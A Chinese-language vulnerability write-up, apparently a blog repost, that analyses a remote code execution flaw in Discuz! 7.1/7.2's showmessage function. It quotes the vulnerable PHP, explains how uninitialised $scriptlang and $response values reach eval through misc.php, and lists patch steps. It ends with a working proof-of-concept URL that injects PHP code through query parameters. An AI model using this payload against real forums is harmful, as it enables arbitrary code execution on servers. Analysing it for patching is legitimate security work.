showmessage函數裏

首先說一下,漏洞是t00ls核心羣傳出去的,xhming先去讀的,而後我後來讀的,讀出來的都是代碼執行,1月5日夜裏11點多鐘,在覈心羣的黑客們的要求下,xhming給了個poc,我給了個exp,確實發現的是同一個問題。截止夜裏2點多種我下線,還只有t00ls核心羣裏幾我的知道我給出的exp,可我怎麼也想不到,通過半天時間,exp就滿天飛了,並且確實出自昨天個人那個版本。php

不難想象,exp流傳的速度,A與B關係好,A發給B;B與C是好朋友,B發給C...總有人耐不住性子,泄露點風聲,因而就人手一份。最受不了的是,居然有些SB在羣裏拿來叫賣;實在不想說什麼,要叫賣何時輪到你?人心不古,之後有的話仍是本身藏着吧。html

上午漏洞告訴了Saiy,DZ官方的補丁很快就出來了吧。ajax

特別說明:產生漏洞的$scriptlang數組在安裝插件後已經初始化,所以有安裝插件的用戶不受影響。shell

漏洞介紹:數組

Discuz!新版本7.1與7.2版本中的showmessage函數中eval中執行的參數未初始化,能夠任意提交,從而能夠執行任意PHP命令。session

漏洞分析:函數

下面來分析下這個遠程代碼執行漏洞,這個問題真的很嚴重,能夠直接寫shell的:ui

1、漏洞來自showmessage函數:url

function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危險的用法,未初始化的變量能夠直接帶進函數,直接致使了問題產生,from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}

if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}

if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}

include language('messages');

$vars = explode(':', $message);//只要含:就能夠了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//兩個數字便可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化,能夠自定義,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}

......
}
插件

2、DZ的全局機制致使了未初始化的參數能夠任意提交:

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}

3、misc.php正好有個能夠自定義message的點,其實也是未初始化:

elseif($action == 'imme_binding' && $discuz_uid) {

if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response沒有初始化,能夠自定義,from www.oldjun.com

}
}

}

4、漏洞利用:

showmessage函數裏$vars = explode(':', $message);而後message能夠本身控制,因而就很容易了,參數是兩個自定義的數組。

5、漏洞修復:

1.有補丁的打補丁;
2.沒有補丁能夠暫時先註釋引發漏洞的語句,或者對兩個變量賦個值。

poc:

(應Saiy的要求,不發exp了!)註冊一個用戶登錄,而後提交misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

相關文章
相關標籤/搜索